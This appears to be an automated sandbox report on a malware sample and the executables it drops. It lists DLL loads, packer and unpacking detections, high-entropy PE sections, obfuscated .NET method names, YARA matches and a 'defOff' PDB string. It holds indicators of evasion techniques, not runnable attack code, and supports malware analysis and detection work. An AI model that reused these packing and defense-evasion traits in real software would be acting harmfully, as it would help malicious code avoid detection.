Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll

Source: C:\Users\user\Desktop\lIocM276SA.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: lIocM276SA.exe

Static file information: File size 3169280 > 1048576

Source: lIocM276SA.exe

Static PE information: Raw size of jtgdutaj is bigger than: 0x100000 < 0x29a000

Source:	Binary string: my_library.pdbU source: 0717674af5.exe, 0000004B.00000003.2641943936.000000000514B000.00000004.00001000.00020000.00000000.sdmp, 0717674af5.exe, 0000004B.00000002.2734723718.0000000000CBC000.00000040.00000001.01000000.00000011.sdmp, 0717674af5.exe, 00000081.00000003.2843067219.00000000056DB000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: my_library.pdb source: 0717674af5.exe, 0000004B.00000003.2641943936.000000000514B000.00000004.00001000.00020000.00000000.sdmp, 0717674af5.exe, 0000004B.00000002.2734723718.0000000000CBC000.00000040.00000001.01000000.00000011.sdmp, 0717674af5.exe, 00000081.00000003.2843067219.00000000056DB000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: pohtent2.exe, 00000007.00000002.2424020147.0000000002E42000.00000004.00000800.00020000.00000000.sdmp, pohtent2.exe, 00000007.00000002.2842173439.00000000061C0000.00000004.08000000.00040000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2824228045.0000000004297000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2616387171.00000000033A2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2824228045.00000000041D1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: pohtent2.exe, 00000007.00000002.2424020147.0000000002E42000.00000004.00000800.00020000.00000000.sdmp, pohtent2.exe, 00000007.00000002.2842173439.00000000061C0000.00000004.08000000.00040000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2824228045.0000000004297000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2616387171.00000000033A2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2824228045.00000000041D1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: jtb.prototype.Hb=function(a,b){mtb(this);qtb(this)===b?rtb(this,a):this.kb.set(b,a)};var rtb=function(a,b){a.ka={zJ:a.wa.getState().id,Yva:b,listener:null};b()},qtb=function(a){return(a=a.wa.getState())&&(a=a.userData)&&a.PDb?a.PDb:null};_.Yn(_.ERa,jtb); source: chromecache_193.16.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: pohtent2.exe, 00000007.00000002.2815064831.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, pohtent2.exe, 00000007.00000002.2718733525.0000000003E05000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2824228045.000000000424D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 4477947f1f.exe, 0000006E.00000003.2838649270.00000000050A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: pohtent2.exe, 00000007.00000002.2815064831.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, pohtent2.exe, 00000007.00000002.2718733525.0000000003E05000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2824228045.000000000424D000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\lIocM276SA.exe	Unpacked PE file: 0.2.lIocM276SA.exe.2d0000.0.unpack :EW;.rsrc:W;.idata :W;jtgdutaj:EW;mylnqymk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;jtgdutaj:EW;mylnqymk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 1.2.skotes.exe.400000.0.unpack :EW;.rsrc:W;.idata :W;jtgdutaj:EW;mylnqymk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;jtgdutaj:EW;mylnqymk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.400000.0.unpack :EW;.rsrc:W;.idata :W;jtgdutaj:EW;mylnqymk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;jtgdutaj:EW;mylnqymk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 6.2.skotes.exe.400000.0.unpack :EW;.rsrc:W;.idata :W;jtgdutaj:EW;mylnqymk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;jtgdutaj:EW;mylnqymk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Unpacked PE file: 56.2.2090621607.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W;neuqwbdo:EW;ivatdflj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;neuqwbdo:EW;ivatdflj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Unpacked PE file: 75.2.0717674af5.exe.c90000.0.unpack :EW;.rsrc :W;.idata :W; :EW;mjfoaubi:EW;luvachek:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;mjfoaubi:EW;luvachek:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Unpacked PE file: 95.2.2090621607.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W;neuqwbdo:EW;ivatdflj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;neuqwbdo:EW;ivatdflj:EW;.taggant:EW;

.NET source code contains method to dynamically call methods (often used by packers)

Source: 7.2.pohtent2.exe.3e8cdc0.1.raw.unpack, qZd874ssH8FbjZUkwHY.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 7.2.pohtent2.exe.5ef0000.4.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 7.2.pohtent2.exe.5ef0000.4.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 7.2.pohtent2.exe.5ef0000.4.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 7.2.pohtent2.exe.5ef0000.4.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 7.2.pohtent2.exe.5ef0000.4.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 7.2.pohtent2.exe.3e8cdc0.1.raw.unpack, bEuExf2uBBP3wVeiBX.cs	.Net Code: MjbNIfI07rysaHiuUYs System.AppDomain.Load(byte[])
Source: 7.2.pohtent2.exe.61c0000.5.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 7.2.pohtent2.exe.61c0000.5.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 7.2.pohtent2.exe.61c0000.5.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 7.2.pohtent2.exe.5e40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2424020147.0000000002E42000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003B.00000002.2616387171.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2799881081.0000000005E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pohtent2.exe PID: 8056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TypeId.exe PID: 13156, type: MEMORYSTR

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[1].exe.6.dr	Static PE information: real checksum: 0x2aecea should be: 0x2a9ec3
Source: pohtent2[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x14ffec
Source: pohtent2.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x14ffec
Source: random[1].exe1.6.dr	Static PE information: real checksum: 0x20f04b should be: 0x204fc3
Source: 4477947f1f.exe.6.dr	Static PE information: real checksum: 0x2aecea should be: 0x2a9ec3
Source: 2090621607.exe.6.dr	Static PE information: real checksum: 0x32175c should be: 0x325b03
Source: TypeId.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x14ffec
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x313984 should be: 0x30bd04
Source: 0717674af5.exe.6.dr	Static PE information: real checksum: 0x20f04b should be: 0x204fc3
Source: random[1].exe0.6.dr	Static PE information: real checksum: 0x32175c should be: 0x325b03
Source: lIocM276SA.exe	Static PE information: real checksum: 0x313984 should be: 0x30bd04

Source: lIocM276SA.exe	Static PE information: section name:
Source: lIocM276SA.exe	Static PE information: section name: .idata
Source: lIocM276SA.exe	Static PE information: section name: jtgdutaj
Source: lIocM276SA.exe	Static PE information: section name: mylnqymk
Source: lIocM276SA.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name: jtgdutaj
Source: skotes.exe.0.dr	Static PE information: section name: mylnqymk
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name: qwqwnrei
Source: random[1].exe.6.dr	Static PE information: section name: usbtzceq
Source: random[1].exe.6.dr	Static PE information: section name: .taggant
Source: 4477947f1f.exe.6.dr	Static PE information: section name:
Source: 4477947f1f.exe.6.dr	Static PE information: section name: .idata
Source: 4477947f1f.exe.6.dr	Static PE information: section name: qwqwnrei
Source: 4477947f1f.exe.6.dr	Static PE information: section name: usbtzceq
Source: 4477947f1f.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name: neuqwbdo
Source: random[1].exe0.6.dr	Static PE information: section name: ivatdflj
Source: random[1].exe0.6.dr	Static PE information: section name: .taggant
Source: 2090621607.exe.6.dr	Static PE information: section name:
Source: 2090621607.exe.6.dr	Static PE information: section name: .idata
Source: 2090621607.exe.6.dr	Static PE information: section name: neuqwbdo
Source: 2090621607.exe.6.dr	Static PE information: section name: ivatdflj
Source: 2090621607.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe1.6.dr	Static PE information: section name:
Source: random[1].exe1.6.dr	Static PE information: section name: .rsrc
Source: random[1].exe1.6.dr	Static PE information: section name: .idata
Source: random[1].exe1.6.dr	Static PE information: section name:
Source: random[1].exe1.6.dr	Static PE information: section name: mjfoaubi
Source: random[1].exe1.6.dr	Static PE information: section name: luvachek
Source: random[1].exe1.6.dr	Static PE information: section name: .taggant
Source: 0717674af5.exe.6.dr	Static PE information: section name:
Source: 0717674af5.exe.6.dr	Static PE information: section name: .rsrc
Source: 0717674af5.exe.6.dr	Static PE information: section name: .idata
Source: 0717674af5.exe.6.dr	Static PE information: section name:
Source: 0717674af5.exe.6.dr	Static PE information: section name: mjfoaubi
Source: 0717674af5.exe.6.dr	Static PE information: section name: luvachek
Source: 0717674af5.exe.6.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\lIocM276SA.exe	Code function: 0_2_002ED91C push ecx; ret	0_2_002ED92F
Source: C:\Users\user\Desktop\lIocM276SA.exe	Code function: 0_2_002E1359 push es; ret	0_2_002E135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_0041D91C push ecx; ret	1_2_0041D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0041D91C push ecx; ret	2_2_0041D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0045009F push cs; iretd	6_2_004500A2
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_004500A3 push cs; iretd	6_2_004500A6
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0041D91C push ecx; ret	6_2_0041D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0043DEDB push ss; iretd	6_2_0043DEDC
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0041DFC6 push ecx; ret	6_2_0041DFD9
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05C91DB1 push 02F00114h; retf	7_2_05C91DB6
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05C91913 push eax; ret	7_2_05C9191D
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05C94AC3 push esp; retf	7_2_05C94AC5
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05C95C94 push ecx; retf	7_2_05C95C95
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05E33530 push edi; retf 0005h	7_2_05E33532
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05E334A1 push edx; retf 0005h	7_2_05E334A2
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05E33410 push ecx; retf 0005h	7_2_05E33412
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05E34F79 pushad ; retf 0005h	7_2_05E34F7A
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05E34F30 pushad ; retf 0005h	7_2_05E34F32
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05E35968 push esp; retf 0005h	7_2_05E35969
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05E33039 push eax; retf 0005h	7_2_05E3303A
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05E33368 push ecx; retf 0005h	7_2_05E3336A
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05E33320 push ecx; retf 0005h	7_2_05E33322
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05E33279 push eax; retf 0005h	7_2_05E3327A
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F51778 pushfd ; retf	7_2_05F51806
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F50006 push 8B5505CBh; retf	7_2_05F5003E
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F711D8 push eax; iretd	7_2_05F711D9
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F7909D push esp; retf	7_2_05F790A6
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F78222 pushad ; iretd	7_2_05F78223
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F78F90 push ebp; retf	7_2_05F78F9E
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_06163DF7 push ss; ret	7_2_06163DFA
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_061B7338 push ecx; retf	7_2_061B7346

Source: lIocM276SA.exe	Static PE information: section name: entropy: 7.091699330201492
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.091699330201492
Source: pohtent2[1].exe.6.dr	Static PE information: section name: .text entropy: 7.980488518665375
Source: pohtent2.exe.6.dr	Static PE information: section name: .text entropy: 7.980488518665375
Source: random[1].exe.6.dr	Static PE information: section name: entropy: 7.787226815574173
Source: 4477947f1f.exe.6.dr	Static PE information: section name: entropy: 7.787226815574173
Source: random[1].exe0.6.dr	Static PE information: section name: entropy: 7.078415292595299
Source: 2090621607.exe.6.dr	Static PE information: section name: entropy: 7.078415292595299
Source: random[1].exe1.6.dr	Static PE information: section name: mjfoaubi entropy: 7.952746909262265
Source: 0717674af5.exe.6.dr	Static PE information: section name: mjfoaubi entropy: 7.952746909262265
Source: TypeId.exe.7.dr	Static PE information: section name: .text entropy: 7.980488518665375

Source: 7.2.pohtent2.exe.3e8cdc0.1.raw.unpack, -Module--c28e6404-3cdb-402a-89c5-ad4194831132-.cs	High entropy of concatenated method names: 'te6d15741cc5d48488076ab09dcf369b0', 'ReadService', 'OrderService', 'PopService', 't1nDAUAo79yZdnyoNrD', 'FmK7ffA0fDRCr8FwDhb', 'moZJKFABLJpFJax0fMJ', 'MI5V1eAp5Wq3Gr1lN3a', 'kT2GmyAFfphjOlfTuBk', 'reYuwhAUGgcTmewcYWW'
